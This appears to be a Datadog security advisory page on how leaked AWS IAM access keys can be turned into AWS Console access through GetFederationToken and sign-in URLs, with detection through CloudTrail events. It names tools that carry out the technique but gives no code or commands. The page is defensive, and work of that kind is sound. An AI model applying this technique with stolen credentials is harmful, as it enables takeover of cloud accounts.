About
An attacker with access to leaked programmatic credentials, such as an AWS IAM user access key, can use the GetFederationToken API call to authenticate to the AWS Console.
Understanding Impact
Business Impact
The AWS Console controls your cloud environment. Depending on the permissions of the compromised user, an attacker with access to the AWS Console can access everything in your cloud environment. It is a common misconception that machine or programmatic credentials can be used to authenticate to the AWS Console.
Technical Impact
While long-lived IAM user access keys are typically referred to as "programmatic credentials," they can also be used to authenticate to the AWS Console. First, by generating temporary credentials using GetFederationToken. These temporary credentials can then be used to authenticate to the AWS Console by generating a sign-in URL. The process is straightforward to execute through tools like aws-vault or aws_consoler.
Detection
You can identify when an IAM user performs a call to GetFederationToken, then authenticates to the AWS console, using CloudTrail events GetFederationToken and ConsoleLogin.
How Datadog can help
Cloud SIEM
Datadog Cloud SIEM detects this attack using the following out-of-the-box rules:
References
GetFederationToken API
aws documentation
About sign-in URLs
aws documentation
Create a Console Session from IAM Credentials
hackingthe.cloud
aws_consoler tool
github.com
aws-vault
github.com